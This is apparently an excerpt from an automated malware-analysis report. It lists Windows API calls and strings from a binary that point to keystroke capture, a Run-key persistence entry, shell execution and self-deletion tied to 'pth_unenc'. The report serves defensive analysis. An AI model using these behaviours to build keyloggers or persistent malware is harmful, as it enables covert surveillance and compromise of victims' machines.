                • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
              Strings
              Similarity
              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
              • String ID: [AltL]$[AltR]
              APIs
              • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
              • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
              Strings
              Similarity
              • API ID:
              • String ID: uD
              APIs
              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
              Strings
              Similarity
              • API ID: ExecuteShell
              • String ID: !D@$open
              APIs
              • GetKeyState.USER32(00000012), ref: 0040B6A5
              Strings
              Similarity
              • API ID: State
              • String ID: [CtrlL]$[CtrlR]
              APIs
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              • __Init_thread_footer.LIBCMT ref: 00410F29
              Strings
              Similarity
              • API ID: Init_thread_footer__onexit
              • String ID: ,kG$0kG
              APIs
              Strings
              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
              Similarity
              • API ID: DeleteOpenValue
              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
              APIs
              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
              Strings
              Similarity
              • API ID: DeleteDirectoryFileRemove
              • String ID: pth_unenc
              APIs
              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
              • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
              Strings
              Similarity
              • API ID: ObjectProcessSingleTerminateWait
              • String ID: pth_unenc
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
              • GetLastError.KERNEL32 ref: 00440D35
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
              Similarity
              • API ID: ByteCharMultiWide$ErrorLast
              • String ID:
              APIs
              • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
              • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
              • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
              Similarity
              • API ID: ErrorLastRead
              • String ID: